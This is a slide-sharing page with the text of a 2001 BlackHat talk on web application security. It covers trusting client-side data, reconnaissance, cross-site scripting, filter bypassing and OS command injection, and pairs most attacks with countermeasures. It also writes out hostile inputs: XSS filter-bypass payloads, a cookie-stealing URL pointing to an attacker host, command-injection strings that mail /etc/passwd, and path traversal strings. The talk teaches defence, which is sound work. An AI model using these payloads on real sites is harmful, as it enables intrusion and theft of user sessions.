Upload
jeremiah-grossman
View
1.984
Download
1
Embed Size (px)
DESCRIPTION
Web Application Security: The Land that Information Security ForgotToday, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security.During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.
Citation preview
BlackHat Amsterdam 2001
Web Application SecurityThe Land that Information Security Forgot.
Presenter: Jeremiah Grossman
Copyright 2001 WhiteHat Security All Rights Reserved
Topics
Web Application Security Landscape
Common Web Application Security Mistakes
Web Application Attack Methodologies
2001 © WhiteHat Security, Inc.
Topics
Web Application Attack Methodologies
Information & DiscoveryInput Manipulation & Parameter Tampering
Cross-Site ScriptingSystem Mis-Configuration
2001 © WhiteHat Security, Inc.
But Why!?
• Easiest way to compromise hosts, networks and• users.• Widely deployed.• No Logs! (POST Request payload)• Incredibly hard to defend against or detect.• Most don’t think of locking down web
applications.• Intrusion Detection is a joke.• Firewall? What firewall? I don’t see no any
firewall.• Encrypted transport layer does nothing.• Best of all, no one is looking anyway.
2001 © WhiteHat Security, Inc.
How much easier can it get!?
Oh right.
Unicode
2001 © WhiteHat Security, Inc.
Web Application The Simple Definition
A web application or web service is asoftware application that is
accessibleusing a web browser or HTTP(s) useragent.
2001 © WhiteHat Security, Inc.
Web Security Layers
2001 © WhiteHat Security, Inc.
The Implementation
EntertainmentMessage BoardsWebMailGuest BooksVoting Polls
E-CommerceShoppingAuctionsBankingStock Trading
Just Plain CrazyPrintersPDA’s
Cell PhonesSystem
Configuration.NET/Passport
2001 © WhiteHat Security, Inc.
Firewall
2001 © WhiteHat Security, Inc.
2001 © WhiteHat Security, Inc.
Common Web Application Security Mistakes
2001 © WhiteHat Security, Inc.
Trusting Client-Side Data
DO NOT TRUST CLIENT-SIDE DATA!
Trusting Client-Side Data is #1 cause of vulnerabilities.
Identify all input parameters that trust client-side data.
2001 © WhiteHat Security, Inc.
Trusting Client-Side Data
The Level of TrustE-Commerce Shopping
Numbers<input type=hidden value=2149.37>
2149.00
Too much for a new VAIO!
<input type=hidden value=2.99> 2.99
Now On Sale!
2001 © WhiteHat Security, Inc.
Trusting Client-Side Data
The Level of TrustSearches/Queries/Templates
Pathhttp://foo.com/cgi?val=string&file=/html/
name.db
Or better yet…
http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd
2001 © WhiteHat Security, Inc.
Unescaped Special Characters
! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
Check for:Unescaped special characters
within input strings
2001 © WhiteHat Security, Inc.
HTML Character Filtering
Proper handling of special characters
> => >< => <
" => "& => &
Null characters should all be removed. %00
2001 © WhiteHat Security, Inc.
More mistakes…
SUID (Does a web application really need root?)
Authentication mechanisms using technologies such
as JavaScript or ActiveX.
Lack of re-authenticating the user before issuing new
passwords or performing critical tasks.
Hosting of uncontrolled data on a protected domain.
2001 © WhiteHat Security, Inc.
Information & Discovery
Spidering/Site CrawlingIdentifiable CharacteristicsErrors and Response CodesFile/Application EnumerationNetwork Reconnaissance
2001 © WhiteHat Security, Inc.
Spidering/Site Crawling
Site MapService Map Documentation
Hidden ServicesCGI's and FormsEmail addresses
Tools: WGEThttp://www.gnu.org/software/wget/
wget.html
2001 © WhiteHat Security, Inc.
Identifiable Characteristics
Comment LinesURL ExtensionsMeta TagsCookiesClient-Side scripting languages
Enormous wealth of information about process flows, debug command, system types and
configurations.
2001 © WhiteHat Security, Inc.
Error and Response Codes
HTTP Response HeadersServer: IBM/Apache 1.3.19Cookie Characteristics
Error MessagesException Messages (Java / SQL)404 Error PagesFailed LoginLocked AccountDatabase or file non-existent
2001 © WhiteHat Security, Inc.
File/Application Enumeration
Commonly referred to as “forced browsing” or “CGI Scanning”.
Directory Browsing Index Listings
http://www.foo.com/dir3/dir2/dir1/file.html
Try:
http://www.foo.com/dir3/dir2/dir1/
http://www.foo.com/dir3/dir2/
http://www.foo.com/dir3/
Tools: Whisker
http://www.wiretrip.net/
2001 © WhiteHat Security, Inc.
File/Application Enumeration
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
2001 © WhiteHat Security, Inc.
Network Reconnaissance
WHOIS
ARIN http://www.arin.net/whois/index.html
Port Scan (Nmap)http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING) http://www.hping.org/
NSLookup/ Reverse DNS
DNS Zone Transfer (DIG)
OS Finger Printing (Nmap or Xprobe)
2001 © WhiteHat Security, Inc.
Input Manipulation Parameter Tampering"Twiddling Bits."
Cross-Site Scripting
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers
2001 © WhiteHat Security, Inc.
Cross-Site ScriptingBad name given to a dangerous security
issue
Attack targets the user of the system rather
than the system itself.
Outside client-side languages executing within
the users web environment with the same
level of privilege as the hosted site.
2001 © WhiteHat Security, Inc.
Client-Side Scripting Languages
DHTML (HTML, XHTML, HTML x.0)Opens all the doors.
JavaScript (1.x) Browser/DOM ManipulationJava (Applets)Malicious AppletsVBScript Browser/DOM ManipulationFlash Dangerous Third-Party
InteractivityActiveX Let me count the ways…XML/XSL Another Door OpenerCSS Browser/DOM Manipulation
2001 © WhiteHat Security, Inc.
Accessing the DOM & Outside the DOM
Document Object Model (DOM)
Client-Side languages possess an enormous amount of power to
access and manipulate the DOM within a browser.
Complex & diverse interconnections create an increased the level of
access within the DOM.
Increased level of access to read & modify DOM data ranging
anything from background colors, to a file on your systems, and
beyond to executing systems calls.
2001 © WhiteHat Security, Inc.
Authentication/Authorization “Hand in the cookie jar.”
Cookies are restricted to domains (.acme.com)Uncontrolled data on a restricted domain can accessthe cookie data.
JavaScript Expression: "document.cookie"window.opendocument.img.srcHidden Form Submit
www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
Cookie data is passed to a CGI through a GET request to a off
domain host.
2001 © WhiteHat Security, Inc.
The Scenarios
Trick a user to re-login to a spoofed page
Compromise authentication credentials
Load dangerous of maliscious ActiveX
Re-Direct a user or ALL users
Crash the machine or the browser
2001 © WhiteHat Security, Inc.
CSS Danger“The Remote Launch Pad.”
Successfully CSS a user via a protected domain.
Utilizing a Client-Side utility (JavaScript, ActiveX,VBScript, etc.), exploit a browser hole to downloada trojan/virus.
User is unknowingly infected/compromised withina single HTTP page load.
ActiveX Netcat Anyone?
2001 © WhiteHat Security, Inc.
Dangerous HTML“HTML Bad”
<APPLET> Malicious Java Applications<BODY> Altering HTML Page Characteristics<EMBED> Embedding Third-Party Applications (Flash, etc.)<FRAME> Directly calling in other uncontrolled HTML<FRAMESET> Directly calling in other uncontrolled HTML<HTML> Altering HTML Page Characteristics<IFRAME> Directly calling in other uncontrolled HTML<IMG> SCRing Protocol attacks and other abuses<LAYER> Directly calling in other uncontrolled HTML<ILAYER> Directly calling in other uncontrolled HTML<META> META Refreshes. (Client-Redirects)<OBJECT> ActiveX (Nuff Said)<SCRIPT> JavaScript/VBScript Loading<STYLE> Style Sheet and Scripting Alterations
2001 © WhiteHat Security, Inc.
Dangerous Attributes“Attributes Bad”
ATTRIBUTE DANGER LIST (Any HTML Tag that has these attributes)
STYLESRC
HREFTYPE
2001 © WhiteHat Security, Inc.
Filter Bypassing"JavaScript is a Cockroach"
There are all kinds of input filters web applicationsimplement to sanitize data.
This section will demonstrate many known ways inputfilter's can be bypassed to perform malicious functionssuch as, cross-scripting, browser-hijacking, cookie theft,and others.
Client-Side Scripting (CSS) attacks require the executionof either, JavaScript, Java, VBScript, ActiveX, Flash andsome others.
We will be assuming that these web applications acceptHTML, at least in a limited sense.
2001 © WhiteHat Security, Inc.
Testing the Filters
Submit all the raw HTML tags you can find, and then
view the output results.
Combine HTML with tag attributes, such as SRC,
STYLE, HREF and OnXXX (JavaScript EventHandler).
This will show what HTML is allowed, what thechanges were, and possible what dangerous
HTMLcan be exploited.
2001 © WhiteHat Security, Inc.
SCRIPT TAG
Description: The script tag is the simplest form of inputting JavaScript
Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT>
Solution: replace all "script" tags.
2001 © WhiteHat Security, Inc.
SRCing JavaScript Protocol
Description: The JavaScript protocol will execute theexpression entered after the colon. Netscape Tested.
Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');">
Solution: Replace "javascript" strings in all SRC & HREFattributes in HTML tags with another string.
Exp: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless.
Further Information:Any HTML tag with a SRC attribute will execute this script onpage load or on link activation.
As a further protocol pattern matching, keywords "livescript" and "mocha" must be
also replaced for the hold the same possibilities.
*** Netscape code names ***2001 © WhiteHat Security, Inc.
SRCing JavaScript Protocol w/ HTML Entities
Description: As another derivative of the previous, Decimal HTML entities within these
strings can cause filter bypass.
Exploit: <IMG SRC="javasc	ript:alert('JavaScript Executed');">Replacement of entities \10 - \11 - \12 - \13 will also succeed.
Hex instead of Decimal HTML entities will also bypass input filters and execute.
<IMG SRC="javasc
ript:alert('JavaScript Executed');">
As well as placing multiple ZERO's in front.<IMG SRC=javasc
ript:alert('JavaScript Executed');>
Solution:Filter these entities within the string then do your further pattern matching
2001 © WhiteHat Security, Inc.
AND CURLY
Description:Obscure Netscape JavaScript execution line. Exact
syntax isneeded to execute.
Exploit: <IMG SRC="&{alert('JavaScript Executed')};">
Solution:<IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem.
2001 © WhiteHat Security, Inc.
Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.
Exploit: <style TYPE="text/javascript">JS EXPRESSION</style>
Solution: Replace the "javascript" string with "java_script" and all should be fine.
Exploit: Import dangerous CSS.<STYLE type=text/css>@import url(http://server/very_bad.css);</STYLE>
Solution: Filter and replace the "@import“
Exploit: Import a JavaScript Expression through a style tag.<style TYPE="text/css">@import url(javascript:alert('JavaScript Executed')); IE HOLE</style>
Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe. 2001 © WhiteHat Security, Inc.
Using CSS
Click to ExecuteUser must click on a link to execute the script.(Search Fields, 404 Errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
Mass InjectionAll user viewing the page execute the script.(Guest Books, Message Boards)
Post a JavaScript onto a board
Message <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
2001 © WhiteHat Security, Inc.
Using CSS
Directed InjectionSoon as user load the page, script executes.(WebMail, HTML Mail, Messaging)
Send an email with…HELLO <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
Holding the door open(FeedBack, Profiles Pages, anything persistent…)
Load HTML Page with sourced scripts.
<LAYER SRC=“javascript.js”></LAYER>
2001 © WhiteHat Security, Inc.
Twiddling Bits
OS CommandsMeta CharactersPath/Directory Traversal
2001 © WhiteHat Security, Inc.
Power of the Semi-Colonpiping input to the command line.
OS Commandshttp://foo.com/[email protected]
Append:http://foo.com/[email protected];+sendmail+/etc/
passwd
Piping:http://foo.com/[email protected]+|+less
Re-Direct:http://foo.com/[email protected]+>+/
2001 © WhiteHat Security, Inc.
Power of Special Characterspiping input to the command line.
Meta Charactershttp://foo.com/app.cgi?list=file.txt
Altered:http://foo.com/app.cgi?list=*
2001 © WhiteHat Security, Inc.
Power of the Dots and Slashespiping input to the command line.
Path Directory Traversalhttp://foo.com/app.cgi?directory=/path/to/data
DotDot Slash:http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:http://foo.com/app.cgi?dir=path/to/data../../../../etc/././
passwd
Double DotDot Slash:http://foo.com/app.cgi?dir=path/to/data....//….//….//etc/
passwd2001 © WhiteHat Security, Inc.
More Filter Bypassing
Method Alteration (HEAD, PUT, POST, GET, ect.)
URL Encode
http://www.foo.com/cgi?value=%46%72%68%86
Null Characters
http://www.foo.com/cgi?value=file%00.html
More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.
2001 © WhiteHat Security, Inc.
More bits…
Hidden Form Field Manipulation
HTTP Headers (Cookies, Referers…)
2001 © WhiteHat Security, Inc.
System Mis-Configurations“patches, patches, and more patches…"
Vendor PatchesDefault Accounts
Check:Web Server permission by directory browsingSoftware version from DiscoveryKnown default accounts in commercial
platformsBugTraqAnonymous FTP open on Web Server
2001 © WhiteHat Security, Inc.
Other Dirty Tricks“Abuse can be far more time consuming, costly and
dangerous”
Mass Account LockoutAttacks against brute force
3 Time Failure Lock-Out Rule
Purposely fail the 3 attempts again thousands of accounts. If the login is
sequential, even better.
2001 © WhiteHat Security, Inc.
Other Dirty Tricks“Abuse can be far more time consuming, costly and
dangerous”
Brute Force/Page SequencingAttacks against process flow
Use 1 0r 2 pieces of data to get the rest.
Slowly brute force the process for dataaggregation.
2001 © WhiteHat Security, Inc.
Thank YouBlackHat and Attendees
Questions?
Jeremiah [email protected]
WhiteHat SecurityAll presentation updates will be available on
www.whitehatsec.com
2001 © WhiteHat Security, Inc.